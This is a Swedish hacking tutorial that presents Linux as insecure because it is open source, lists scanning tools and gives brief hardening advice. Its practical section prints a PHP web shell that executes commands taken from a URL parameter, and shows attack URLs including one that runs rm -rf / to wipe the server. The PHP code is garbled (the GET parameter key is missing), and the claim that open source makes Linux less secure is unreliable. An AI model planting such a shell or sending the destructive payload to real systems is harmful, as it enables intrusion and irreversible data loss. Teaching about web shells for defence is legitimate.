Linux är det mest använda serveroperativsystemet, särskilt för webbservrar. Det är öppen källkod; det innebär att vem som helst kan få tillgång till källkoden. Detta gör det mindre säkert jämfört med andra operativsystem eftersom angripare kan studera källkoden för att hitta sårbarheter. Linux för hackare handlar om att utnyttja dessa sårbarheter för att få obehörig åtkomst till ett system.
I den här artikeln kommer vi att introducera dig till vad Linux är, dess säkerhetsbrister, hackning med Ubuntu och de motåtgärder du kan sätta in.
Ämnen som behandlas i den här handledningen
- Snabb anmärkning om Linux
- Linux Hacking Tools
- Hur man förhindrar Linux-hackningar
- Hacking Activity: Hacka ett Linuxsystem med PHP
Kort om Linux
Linux är ett operativsystem med öppen källkod. Det finns många distributioner av Linuxbaserade operativsystem som Redhat, Fedora och Ubuntu osv. Till skillnad från andra operativsystem är Linux mindre säkert när det gäller säkerhet. Detta beror på att källkoden är fritt tillgänglig, så det är lätt att studera den efter sårbarheter och utnyttja dem jämfört med andra operativsystem som inte har öppen källkod. Linux kan användas som operativsystem för servrar, skrivbord, surfplattor eller mobila enheter.
Linuxprogram kan styras med hjälp av antingen GUI eller kommandon. Linuxkommandon för Kali Linux-hackning är mer effektiva och ändamålsenliga jämfört med att använda GUI. Därför hjälper det att känna till grundläggande Linuxkommandon för hackning.
Se dessa handledningar https://www.guru99.com/unix-linux-tutorial.html om hur du kommer igång med Kali Linux-hackning.
Linux Hacking Tools
- Nessus- det här verktyget kan användas för att hacka Ubuntu, skanna konfigurationsinställningar, patchar och nätverk etc. Det finns på https://www.tenable.com/products/nessus
- NMap. Det här verktyget kan användas för att övervaka värddatorer som körs på servern och de tjänster som de använder. Det kan också användas för att söka efter portar. Det finns på https://nmap.org/
- SARA – SARA är akronymen för Security Auditor’s Research Assistant. Som namnet antyder kan det här verktyget användas för att granska nätverk mot hot som SQL-injektion, XSS etc. Det finns på http://www-arc.com/sara/sara.html
Ovanstående lista är inte uttömmande; den ger dig en uppfattning om de verktyg som finns tillgängliga för Ubuntu-hackning och hackning av Linuxsystem.
Hur man förhindrar Linuxhackning
Linuxhackning utnyttjar sårbarheterna i operativsystemet. En organisation kan anta följande policy för att skydda sig mot sådana attacker.
- Patchhantering – patchar åtgärdar buggar som angripare utnyttjar för att äventyra ett system. En bra policy för patchhantering säkerställer att du ständigt tillämpar relevanta patchar på ditt system.
- Korrekt konfiguration av operativsystemet- andra exploateringar utnyttjar svagheter i serverns konfiguration. Inaktiva användarnamn och daemoner bör inaktiveras. Standardinställningar som vanliga lösenord till program, standardanvändarnamn och vissa portnummer bör ändras.
- Intrusion Detection System- sådana verktyg kan användas för att upptäcka obehörig åtkomst till systemet. Vissa verktyg har förmågan att upptäcka och förhindra sådana attacker.
Hacking Activity: I det här praktiska scenariot kommer vi att lära oss hur man hackar ett Ubuntu Linux-system med hjälp av PHP
I det här praktiska scenariot kommer vi att lära oss hur man hackar Ubuntu och vi kommer att ge dig grundläggande information om hur du kan använda PHP för att äventyra ett Linux. Vi kommer inte att rikta in oss på något offer. Om du vill prova kan du installera LAMPP på din lokala maskin.
PHP har två funktioner som kan användas för att utföra Linux hackningskommandon. Den har funktionerna exec() och shell_exec(). Funktionen exec() returnerar den sista raden i kommandoutgången medan shell_exec() returnerar hela resultatet av kommandot som en sträng.
I demonstrationssyfte antar vi att angriparen förvaltar att ladda upp följande fil på en webbserver.
<?php$cmd = isset($_GET) ? $_GET : 'ls -l';echo "executing shell command:-> $cmd</br>";$output = shell_exec($cmd);echo "<pre>$output</pre>";?>
HÄR,
Ovanstående skript hämtar kommandot från GET-variabeln med namnet cmd. Kommandot utförs med hjälp av shell_exec() och resultaten returneras i webbläsaren.
Ovanstående kod kan utnyttjas med hjälp av följande URL
http://localhost/cp/konsole.php?cmd=ls%20-l
HÄR,
- ”…konsole.php?cmd=ls%20-l ”tilldelar värdet ls -l till variabeln cmd.
Kommandot i Ubuntu för att hacka mot servern kommer att exekveras som
shell_exec('ls -l') ;
Exekvering av ovanstående kod på en webbserver ger resultat som liknar följande.
Ovanstående kommando visar helt enkelt filerna i den aktuella katalogen och behörigheterna
Låt oss anta att angriparen utför följande kommando
rm -rf /
HÄR,
- ”rm” tar bort filerna
- ”rf” gör att rm-kommandot körs i rekursivt läge. Radar alla mappar och filer
- ”/” instruerar kommandot att börja radera filer från rotkatalogen
Attackens URL skulle se ut ungefär så här
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
Sammanfattning
- Linux är ett populärt operativsystem för servrar, stationära datorer, surfplattor och mobila enheter.
- Linux är ett öppet källkodssystem, och källkoden kan erhållas av alla. Detta gör det lätt att upptäcka sårbarheter. Det är ett av de bästa operativsystemen för hackare.
- Grundläggande hackningskommandon och nätverkskommandon i Ubuntu är värdefulla för Linux-hackare.
- Sårbarheter är en svaghet som kan utnyttjas för att kompromettera ett system.
- Ett bra säkerhetssystem kan hjälpa till att skydda ett system från att bli komprometterat av en angripare.